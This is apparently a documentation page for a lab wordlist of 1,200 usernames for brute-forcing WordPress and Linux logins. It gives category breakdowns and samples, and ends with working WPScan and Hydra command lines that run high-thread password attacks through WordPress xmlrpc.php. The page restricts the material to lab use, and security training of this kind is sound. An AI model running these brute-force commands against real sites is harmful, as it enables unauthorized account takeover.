Skip to main content
users.txt contains 1,200 username entries drawn from the most common categories encountered on real WordPress installations and Linux servers. The list is designed to give broad coverage of plausible login names without growing so large that brute-force attempts become impractically slow in lab environments.
These wordlists are exclusively for educational lab environments. Never run them against systems you do not own or have explicit written permission to test.

Category breakdown

Real first names

Common English and Western first names that administrators frequently use as WordPress usernames: john, jane, alice, bob, mary, admin, evelyn, anthony, dorothy, and more.

System accounts

Built-in UNIX accounts present on most Linux distributions: root, daemon, nobody, www-data, syslog, sshd, bin, messagebus, ntp, and similar.

Service accounts

Accounts tied to popular server software: apache, nginx, mysql, postgres, redis, rabbitmq, memcached, zookeeper, kafka, elasticsearch, docker, and more.

Security tools

Accounts created by security and monitoring products: nagios, zabbix, grafana, kibana, splunk, wazuh, graylog, prometheus, falco, ossec, snyk, crowdstrike, and others.

DevOps tooling

Accounts associated with CI/CD and infrastructure tools: jenkins, gitlab, github, bitbucket, terraform, ansible, vagrant, puppet, chef, airflow, nomad, concourse, and more.

Job roles

Descriptive role-based usernames common in SMB WordPress setups: admin, operator, developer, sysadmin, webmaster, editor, manager, analyst, auditor, devops, helpdesk, support, and others.

Generic numeric accounts

Programmatically generated accounts in the format userNNNN (e.g. user1003, user2345, user9481). These represent bulk-created accounts or subscriber accounts and make up the majority of the list — roughly 600 entries.

Miscellaneous tokens

Protocol names, environment labels, and infrastructure terms sometimes used as WordPress usernames: oauth, saml, totp, staging, prod, backup, replica, primary, secondary, and similar.

Sample entries

The table below shows a representative selection of entries spanning every major category.
UsernameCategory
rootSystem account
daemonSystem account
nobodySystem account
www-dataSystem account
syslogSystem account
apacheService account
nginxService account
mysqlService account
postgresService account
redisService account
nagiosSecurity tool
zabbixSecurity tool
grafanaSecurity tool
splunkSecurity tool
jenkinsDevOps tool
gitlabDevOps tool
ansibleDevOps tool
terraformDevOps tool
adminJob role / first name
developerJob role
sysadminJob role
webmasterJob role
johnReal first name
aliceReal first name
janeReal first name
user3024Generic numeric
user9481Generic numeric
user1188Generic numeric

Using this wordlist

WPScan

wpscan --url http://TARGET/lab/ \
  --usernames users.txt \
  --passwords passwords.txt \
  --password-attack xmlrpc \
  --max-threads 50
See the WPScan guide for full options and rate-limiting recommendations.

Hydra

hydra -L users.txt -P passwords.txt TARGET http-post-form \
  "/lab/xmlrpc.php:<?xml version='1.0'?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>^USER^</string></value></param><param><value><string>^PASS^</string></value></param></params></methodCall>:Incorrect username or password" \
  -t 50
See the Hydra guide for form parameter tuning and throttle settings.
users.txt is intentionally structured so the most likely WordPress usernames (real names, role names, and common admin aliases) appear in the first ~600 lines. Run a quick targeted pass with head -600 users.txt before doing a full sweep with numeric accounts.

Build docs developers (and LLMs) love

Get started for freeTalk to us